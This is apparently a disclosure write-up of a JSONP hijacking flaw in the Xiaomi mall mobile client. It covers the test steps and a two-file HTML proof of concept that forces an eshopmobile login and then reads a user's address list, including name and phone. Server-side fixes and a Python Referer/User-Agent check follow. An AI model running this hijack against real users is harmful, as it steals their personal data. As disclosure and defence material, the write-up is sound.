The application fetches its data over JSONP, so the callback (and the data it wraps) can be read by any page that includes the script.
The Xiaomi mall mobile client is actually a built-in browser that loads m.xiaomi.com, while the user's address, order and other data live on app.shopapi.xiaomi.com. Presumably JSONP is used to cross origins, and as a result JavaScript hijacking can be used to obtain user data.
Test process:
1. Enable Burp and its proxy.
2. Set up a network proxy on the phone, watch the HTTP requests, and observe a series of callback requests.
3. Of what is seen in step 2, only m.xiaomi.com can be hijacked with JS. What about www.xiaomi.com and the other domain names?
4. Found that the login interface used by m.xiaomi.com is https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile; the focus is the eshopmobile sid (eshopmobile logs in to app.shopapi.xiaomi.com synchronously), while eshop
5. Following the analysis in 4, a logged-in user can be lured into visiting https://account.xiaomi.com/pass/serviceLogin?callback=...&sid=eshopmobile, after which the main domain and the other domain names can also be hijacked by JS.
6. Script for hijacking the user's address list:
xiaomi.html
<iframe src="https://account.xiaomi.com/pass/serviceLogin?Signature%2523ac%253Daccount%2526op%253Dindex%26sign%signature%2C%2C&sid=esw.mobile"></iframe> <!-- The sign in it is used for verification; it differs on each login and does not affect the hijack. -->
<script>
setTimeout(function () { location.href = 'xiaomi2.html'; }, 3000);
</script>
xiaomi2.html
<script>
function getall(o) {
    var data = o.data;
    alert(data[0].consignee + ' ' + data[0].tel);
}
</script>
<script src="http://app.shopapi.xiaomi.com/v1/address/list?callback=getall&client_id=180100031013&_=1367750497612"></script>
Solution:
1. Return pure JSON instead, and handle the cross-domain case with a P3P header.
2. If JSONP is really required, check the Referer and the User-Agent.
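A server-side shape of fix 2, as an added example (not Xiaomi's code): the callback wrapper is emitted only when the Referer host is on an allowlist, the User-Agent carries the client's marker and the callback name is a plain identifier; in every other case the endpoint answers with plain JSON, which a cross-origin <script> tag cannot execute. The allowed hosts, the User-Agent marker and the sample addresses are constructed assumptions.

```python
import json
import re
from urllib.parse import urlsplit

# Assumption: pages on these hosts are the only legitimate JSONP consumers.
ALLOWED_REFERER_HOSTS = {"m.xiaomi.com", "www.xiaomi.com"}
# Assumption: the mall client sends a distinguishable User-Agent marker (constructed value).
CLIENT_UA_MARKER = "XiaomiShopApp"
# A callback must be a bare identifier; anything else is refused, not reflected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$")


def referer_allowed(referer):
    """True only for an https page on an allowlisted host; a missing Referer is a deny."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname in ALLOWED_REFERER_HOSTS


def build_response(addresses, callback=None, referer=None, user_agent=""):
    """Return (status, headers, body) for the address list.

    Plain JSON is the default. The JSONP form is produced only when the
    Referer, the User-Agent and the callback name all pass the checks.
    """
    body = json.dumps({"data": addresses})
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    if callback is None:
        return 200, headers, body
    if not (referer_allowed(referer)
            and CLIENT_UA_MARKER in user_agent
            and CALLBACK_RE.match(callback)):
        # Refuse the wrapper: the data never reaches a foreign page's callback.
        return 403, headers, json.dumps({"error": "jsonp not allowed from this origin"})
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, "/**/%s(%s);" % (callback, body)


# Constructed sample record in the shape the page's getall() callback reads.
SAMPLE_ADDRESSES = [{"consignee": "Test User", "tel": "000-0000-0000"}]
```

Because browsers may strip the Referer entirely, a missing header is treated as cross-site rather than allowed through; both headers are still under the control of any client the user chooses to run, so this stops the drive-by script include from another origin, not a deliberately modified client.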